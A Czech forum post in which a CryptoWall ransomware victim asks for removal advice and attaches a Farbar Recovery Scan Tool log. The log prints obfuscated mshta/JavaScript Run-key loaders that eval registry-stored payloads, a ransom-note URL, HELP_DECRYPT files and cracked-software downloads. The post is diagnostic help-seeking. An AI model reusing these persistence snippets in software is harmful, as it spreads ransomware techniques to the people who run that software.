cryptowall
Napsal: 08 zář 2015 18:30
zdravim, tak bohuzel presto ze jsem docela opatrnej sem chytl tuhle potvoru ... dotaz ... ma to cenu zkouset odstranit? respektive je pravdiva tato zprava (http://www.novinky.cz/internet-a-pc/371 ... darmo.html) a nebo to mam formatovat a mlatit hlavou o zed ?
pripadne prikladam log ... : )
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-09-2015
Ran by tomas (administrator) on KRAKONOSOVO (08-09-2015 19:21:47)
Running from C:\Users\tomas\Desktop
Loaded Profiles: tomas (Available Profiles: tomas)
Platform: Windows 8.1 Pro (X64) Language: Angličtina (Spojené státy)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Dassault Systemes) C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(VIBRAND) C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp1EC1.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [114048 2013-10-18] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-10-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1368792 2013-11-13] (Realtek Semiconductor)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [782008 2015-08-26] (Avira Operations GmbH & Co. KG)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [590441228] => C:\ProgramData\mscivosu.exe [71680 2015-06-15] (dswteyurtetuitr)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [icq] => C:\Users\tomas\AppData\Roaming\ICQM\icq.exe [35224072 2014-12-22] (ICQ)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-19] (Valve Corporation)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8358680 2015-06-01] (Piriform Ltd)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**2b3f035b<*>] => mshta javascript:zg1hbnDOb4="L2O";A3I=new%20ActiveXObject("WScript.Shell");Qt4kkEUtE="BlCeVlLM";VoK8Z=A3I.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");ZkFmW9YZY="C7tm";eval(VoK8Z);t2s9Omdgih="lolaL (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [**0001d08f<*>] => mshta javascript:Dx98MFWqhu="aNim";KD89=new%20ActiveXObject("WScript.Shell");Ols2XZzHR="Cor";qnfN81=KD89.RegRead("HKCU\\software\\cbc7e7017e\\d0830d66");tFuOj0s7="yZBlnuKVv";eval(qnfN81);TW4W0HiwIS="Z (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [AZNworks] => C:\Users\tomas\AppData\Local\AZNworks\tmp1EC1.exe [137616 2015-09-08] (VIBRAND)
HKU\S-1-5-21-20688079-3506957125-3551254075-1001\...\Run: [YWPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\tomas\AppData\Local\AZNworks\AstHelper32.dll
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-06] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-01-25]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-09-08] ()
Startup: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-09-08] ()
InternetURL: C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://6i3cb6owitcouepv.speralreaopio.com/62bQfN
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{EB1A1010-ABD0-434D-A917-19F0225ED54C}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-07-14] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-10-15] (Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-03-31] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-08-29] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-03-31] (Microsoft Corporation)
FF Extension: Avira Browser Safety - C:\Users\tomas\AppData\Roaming\Mozilla\Firefox\Profiles\WUHW9Sv9.default\Extensions\abs@avira.com [2014-12-22]
Chrome:
=======
CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hp&ts=1419069686&from=obw&uid=TOSHIBAXMQ01ABD100_24DTP3DZTXX24DTP3DZT
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-22]
CHR Extension: (Google Docs) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-22]
CHR Extension: (Google Drive) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-22]
CHR Extension: (YouTube) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-22]
CHR Extension: (Ingress G+ Ident) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cemdjcbehkacgpiielmiakooedjkkphk [2014-12-22]
CHR Extension: (Google Search) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-22]
CHR Extension: (Tampermonkey) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2014-12-22]
CHR Extension: (Google Sheets) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-22]
CHR Extension: (Avira Browser Safety) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2014-12-22]
CHR Extension: (Google Docs Offline) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-05]
CHR Extension: (AdBlock) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-03-03]
CHR Extension: (Chrome Web Store Payments) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-22]
CHR Extension: (Battlefield Play4Free) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\oiokahphinmbmakkehgelkmpolmnbkdh [2015-06-10]
CHR Extension: (Gmail) - C:\Users\tomas\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [887128 2015-07-27] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [461672 2015-08-26] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1213072 2015-08-26] (Avira Operations GmbH & Co. KG)
R2 BBDemon; C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe [46592 2009-09-26] (Dassault Systemes) [File not signed]
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [117704 2013-10-18] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116680 2013-10-18] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148160 2013-10-18] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [126952 2013-10-18] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.163\McCHSvc.exe [289256 2015-07-31] (McAfee, Inc.)
R2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [966336 2014-12-04] (@ByELDI) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3880448 2013-11-13] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [70928 2013-12-12] (ASUS Corporation)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-27] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2014-11-24] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-03-12] (Avira Operations GmbH & Co. KG)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R3 DptfDevDram; C:\Windows\system32\DRIVERS\DptfDevDram.sys [145640 2013-10-18] (Intel Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [116752 2013-10-18] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [289744 2013-10-18] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494296 2013-10-18] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
S3 LUMDriver; C:\WINDOWS\system32\drivers\LUMDriver.sys [24848 2008-01-02] (IBM)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-10-23] (Intel Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [827096 2015-03-12] (Realsil Semiconductor Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 fdrawcmd; \??\C:\WINDOWS\system32\drivers\fdrawcmd.sys [X]
S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-09-08 19:21 - 2015-09-08 19:22 - 00017939 _____ C:\Users\tomas\Desktop\FRST.txt
2015-09-08 19:19 - 2015-09-08 19:19 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Desktop\FRSTLauncher (1).exe
2015-09-08 19:18 - 2015-09-08 19:18 - 00112640 _____ (forum.viry.cz) C:\Users\tomas\Downloads\Nepotvrzeno 29148.crdownload
2015-09-08 19:17 - 2015-09-08 19:21 - 00000000 ____D C:\FRST
2015-09-08 19:15 - 2015-09-08 19:15 - 02190336 _____ (Farbar) C:\Users\tomas\Desktop\FRST64.exe
2015-09-08 19:08 - 2015-09-08 19:08 - 00000000 ____D C:\Program Files (x86)\ESET
2015-09-08 19:06 - 2015-09-08 19:06 - 02870984 _____ (ESET) C:\Users\tomas\Downloads\esetsmartinstaller_enu.exe
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00008628 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.HTML
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00004254 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.TXT
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Downloads\HELP_DECRYPT.URL
2015-09-08 19:04 - 2015-09-08 19:04 - 00000292 _____ C:\Users\tomas\Desktop\HELP_DECRYPT.URL
2015-09-08 19:01 - 2015-09-08 19:01 - 00008628 _____ C:\Users\tomas\Documents\HELP_DECRYPT.HTML
2015-09-08 19:01 - 2015-09-08 19:01 - 00004254 _____ C:\Users\tomas\Documents\HELP_DECRYPT.TXT
2015-09-08 19:01 - 2015-09-08 19:01 - 00000292 _____ C:\Users\tomas\Documents\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00008628 _____ C:\Users\tomas\AppData\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00004254 _____ C:\Users\tomas\AppData\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:57 - 2015-09-08 18:57 - 00000292 _____ C:\Users\tomas\AppData\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 00008628 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 00004254 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 00000292 _____ C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-09-08 18:41 - 2015-09-08 18:42 - 00000000 ____D C:\Users\tomas\AppData\Local\AZNworks
2015-09-07 21:01 - 2015-09-07 21:06 - 489167296 _____ C:\Users\tomas\Downloads\The.Fappening.zip
2015-09-06 21:28 - 2015-09-06 21:28 - 00048097 _____ C:\Users\tomas\Downloads\20547-courtney-stodden-vypadly-dudy-na-plazi-a-neni-to-pekne.htm
2015-09-06 21:17 - 2015-09-06 21:17 - 00048136 _____ C:\Users\tomas\Downloads\20856-herecka-amanda-seyfried-nam-zase-ukazuje-prsa-a-je-to-fajn.htm
2015-09-06 16:43 - 2015-09-06 16:49 - 00000000 ____D C:\Program Files (x86)\EMBIRD32
2015-09-06 16:41 - 2015-09-06 16:41 - 00003088 _____ C:\WINDOWS\System32\Tasks\{78AC1ACC-0F14-48C3-8F00-757EDF035A96}
2015-09-06 16:38 - 2015-09-06 16:41 - 122506240 _____ C:\Users\tomas\Downloads\embrd2k10b88daio.exe
2015-09-06 16:34 - 2015-09-06 16:34 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d (1).exe
2015-09-06 16:31 - 2015-09-08 18:41 - 00000000 ____D C:\Users\tomas\AppData\Roaming\WinKun
2015-09-06 16:28 - 2015-09-06 16:55 - 00000232 _____ C:\WINDOWS\setupact.log
2015-09-06 16:28 - 2015-09-06 16:28 - 00000000 _____ C:\WINDOWS\setuperr.log
2015-09-06 16:12 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Roaming\EMBIRD32
2015-09-06 16:12 - 2015-09-06 16:12 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2015-09-06 16:11 - 2015-09-06 16:11 - 17931264 _____ C:\Users\tomas\Downloads\embrd2k10b87.exe
2015-09-06 16:08 - 1994-04-19 12:00 - 00000120 _____ C:\WINDOWS\WINRESAZ.INI
2015-09-06 16:08 - 1994-04-19 12:00 - 00000044 _____ C:\WINDOWS\WINKOLES.TXT
2015-09-06 16:05 - 2015-09-06 16:06 - 21437440 _____ C:\Users\tomas\Downloads\embrd2k10b88d.exe
2015-09-06 15:57 - 2015-09-08 18:57 - 00017871 _____ C:\WINDOWS\WindowsUpdate.log
2015-09-06 15:36 - 2015-09-06 15:36 - 00225388 _____ C:\Users\tomas\Downloads\[free-torrents.org]353113_Portable_Launcher.vbs
2015-09-06 15:31 - 2015-09-06 15:31 - 00000000 ____D C:\Users\tomas\AppData\Local\GHISLER
2015-09-06 15:31 - 2013-04-28 16:15 - 00001006 _____ C:\password.klc
2015-09-06 15:30 - 2015-09-06 15:30 - 00000216 _____ C:\Users\tomas\password.klc
2015-09-06 15:29 - 2015-09-06 15:29 - 00000654 _____ C:\Users\tomas\Desktop\Total Commander 64 bit.lnk
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Total Commander
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\Users\tomas\AppData\Roaming\GHISLER
2015-09-06 15:29 - 2015-09-06 15:29 - 00000000 ____D C:\totalcmd
2015-09-06 15:28 - 2015-09-06 15:28 - 04467064 _____ (Ghisler Software GmbH) C:\Users\tomas\Downloads\tcmd852x64.exe
2015-09-06 15:26 - 2004-06-13 14:00 - 00000165 _____ C:\WINDOWS\WINRSEAZ.INI
2015-09-06 15:26 - 2004-06-13 14:00 - 00000137 _____ C:\WINDOWS\WINKLOES.TXT
2015-09-06 15:22 - 2015-09-06 15:23 - 65225616 _____ C:\Users\tomas\Downloads\embrd2k12b95_x64_setup.exe
2015-09-06 15:20 - 2015-09-06 15:20 - 02234524 _____ C:\Users\tomas\Downloads\Embird+2013+crack.ace
2015-09-06 15:19 - 2015-09-06 15:21 - 91942120 _____ C:\Users\tomas\Downloads\embrd2k15b1014_x64_setup.exe
2015-09-06 15:16 - 2015-09-06 15:16 - 00696656 _____ C:\Users\tomas\Downloads\Embird%2B2003%2BBuild%2B5%2BCrack%2BDownloader__3687_i1629569851_il3681408.rar
2015-09-06 15:13 - 2015-09-06 15:13 - 02234524 _____ C:\Users\tomas\Downloads\65868315+studio.zip.ace
2015-09-06 15:11 - 2015-09-06 15:12 - 00000000 ____D C:\Users\tomas\Downloads\Embird
2015-09-06 15:11 - 2015-09-06 15:11 - 00033708 _____ C:\Users\tomas\Downloads\Embird (1).torrent
2015-09-06 15:10 - 2015-09-06 15:10 - 00033708 _____ C:\Users\tomas\Downloads\Embird.torrent
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2015-09-05 10:29 - 2015-09-05 10:29 - 00000000 ____D C:\Program Files\McAfee Security Scan
2015-09-02 19:48 - 2015-09-02 19:48 - 00034723 _____ C:\Users\tomas\Downloads\noblesni.htm
2015-08-26 22:01 - 2015-09-08 18:57 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Skype
2015-08-26 22:01 - 2015-09-08 18:53 - 00000000 ____D C:\Users\tomas\AppData\Local\Skype
2015-08-26 22:01 - 2015-09-06 16:12 - 00000000 ____D C:\ProgramData\Skype
2015-08-26 22:00 - 2015-01-06 05:01 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndproxy.sys
2015-08-26 22:00 - 2015-01-06 04:59 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2015-08-26 22:00 - 2015-01-06 03:12 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascfg.dll
2015-08-26 22:00 - 2015-01-06 03:02 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rascfg.dll
2015-08-26 21:58 - 2015-07-22 16:19 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-08-26 21:58 - 2015-07-22 15:52 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-08-26 21:58 - 2015-07-17 16:15 - 00951296 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-08-26 21:58 - 2015-07-17 16:10 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-08-26 21:58 - 2015-07-14 05:27 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzsync.exe
2015-08-26 21:58 - 2015-07-13 21:10 - 00411455 _____ C:\WINDOWS\system32\ApnDatabase.xml
